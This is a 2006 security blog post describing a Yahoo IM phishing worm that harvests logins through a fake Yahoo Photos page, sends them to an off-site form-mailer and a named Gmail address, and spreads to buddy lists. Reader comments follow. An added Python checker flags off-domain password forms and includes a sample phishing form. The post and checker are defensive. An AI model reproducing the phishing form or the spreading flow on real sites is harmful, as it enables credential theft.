Mom, how could you! Part II: Revenge of the Yahoo! worm
Dave G. | November 24th, 2006 | Filed Under: Malware
'Tis the season! Looks like the same fellow who did this chose Thanksgiving Day to strike again. Good timing from an attacker's perspective. This was sent to my Yahoo IM:
http://www.geocities.com/isyourfriendneartoyou08/ Find your match
And then it:
- presents a Yahoo! Photos page
- steals credentials on submit
- sends them to: http://www2.fiberbit.net/form/mailto.cgi
- which mails them to “sanchopansas@gmail.com”
- redirects the user to their own Yahoo! Photos page
- logs into Yahoo IM as the unfortunate sap
- sends the URL to everyone on their buddy list
Have (or hope you had) a Happy Thanksgiving!
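
A defender can spot this pattern from the page source alone: a password form whose submit target is not the brand's own domain. The check below is an added example, not code from the original post; the trusted-domain list, the field names and the recipient address in the sample are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

class FormAudit(HTMLParser):
    """Collect each <form>'s action and the <input> fields inside it."""

    def __init__(self):
        super().__init__()
        self.forms, self._open = [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._open = {"action": a.get("action") or "", "inputs": []}
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            kind = (a.get("type") or "text").lower()
            self._open["inputs"].append((kind, a.get("value") or ""))

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None

def suspicious_forms(page_url, html, trusted_domains):
    """Report password forms whose submit target is outside trusted_domains."""
    parser = FormAudit()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        if not any(kind == "password" for kind, _ in form["inputs"]):
            continue  # not a credential form
        target = urljoin(page_url, form["action"])  # empty action = the page itself
        host = (urlparse(target).hostname or "").lower()
        if any(host == d or host.endswith("." + d) for d in trusted_domains):
            continue
        # Form-mailer scripts often take the recipient from a hidden field.
        hidden = [v for kind, v in form["inputs"] if kind == "hidden" and "@" in v]
        findings.append({"target": target, "host": host, "hidden_recipients": hidden})
    return findings

# Constructed sample: page URL and form action are the ones named in the post;
# the field names and the recipient address are placeholders.
SAMPLE_URL = "http://www.geocities.com/isyourfriendneartoyou08/"
SAMPLE_HTML = """
<form method="post" action="http://www2.fiberbit.net/form/mailto.cgi">
  <input type="hidden" name="recipient" value="collector@example.invalid">
  <input type="text" name="login"> <input type="password" name="passwd">
</form>"""
FINDINGS = suspicious_forms(SAMPLE_URL, SAMPLE_HTML, ["yahoo.com"])
```
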


Subliminal
November 27th, 2006 7:57 am
I just got this a few weeks ago from a friend on my Yahoo list. Then early this morning from my gf. Now I know for a fact her computer isn’t secure at all. I checked the link from her using Firefox and reviewed the page source info and sure enough there was “sanchopansas@gmail.com”. What steps can she take to remove this? Does it put a virus on her comp? Or does this sancho person log on as them once in a while and send the links? How does this really work?
Dave G.
November 28th, 2006 4:01 am
Subliminal:
Most likely some automated software logs in as her and sends the IM. If she changes her password she should be fine.
Dave